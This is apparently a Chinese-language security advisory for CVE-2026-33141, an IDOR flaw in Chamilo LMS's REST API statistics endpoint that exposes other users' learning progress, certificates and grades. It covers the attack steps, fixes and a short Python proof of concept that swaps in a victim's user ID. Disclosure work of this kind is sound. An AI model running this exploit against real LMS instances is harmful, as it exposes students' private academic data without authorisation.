CVE-2026-33141 CVSS 6.5 中危

CVE-2026-33141 Chamilo LMS IDOR漏洞致信息泄露

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33141

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Chamilo LMS

漏洞概述

Chamilo LMS 2.0.0-RC.3之前版本存在IDOR漏洞。攻击者利用REST API统计端点的缺陷，可绕过权限验证，读取任意用户的学习进度、证书及成绩单敏感信息。

技术细节

该漏洞源于Chamilo LMS REST API统计端点中缺乏适当的对象级别访问控制验证。在受影响版本中，应用程序仅依赖用户身份认证，而未校验请求者是否对目标资源ID拥有访问权限，从而导致不安全的直接对象引用（IDOR）。任何经过身份认证的低权限用户（如拥有ROLE_USER角色的学生），可以通过构造特定的HTTP请求，修改URL路径或参数中的目标用户ID，绕过注册或监管关系的限制，直接获取系统中任意用户的学习进度、证书详情及成绩单分数。该漏洞破坏了多租户环境下的数据隔离原则。

攻击链分析

STEP 1

1. 信息收集

攻击者注册一个低权限账户（如学生账户），获取有效的访问令牌或会话Cookie。

STEP 2

2. 漏洞利用

攻击者分析REST API，发现统计端点。通过修改请求中的用户ID参数，尝试访问其他用户的数据。

STEP 3

3. 数据获取

服务器因缺乏权限校验，返回目标用户的学习进度、证书和成绩信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Configuration
target_url = "https://target-chamilo-instance.com"
api_endpoint = "/restapi/stats" # Placeholder endpoint based on description
attacker_token = "<ATTACKER_JWT_TOKEN>"
victim_user_id = "123" # ID of the user to target

headers = {
    "Authorization": f"Bearer {attacker_token}",
    "Content-Type": "application/json"
}

# Exploit: Request stats for a different user ID
response = requests.get(f"{target_url}{api_endpoint}/{victim_user_id}", headers=headers)

if response.status_code == 200:
    data = response.json()
    print("[+] Exploit Successful!")
    print(f"[+] Victim Learning Progress: {data.get('progress')}")
    print(f"[+] Victim Grades: {data.get('grades')}")
else:
    print("[-] Exploit Failed")

影响范围

Chamilo LMS < 2.0.0-RC.3

防御指南

临时缓解措施

建议立即升级至修复版本。若暂时无法升级，应通过网络访问控制列表（ACL）限制对REST API的访问，或监控异常的API访问请求，特别是针对统计端点的批量查询。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表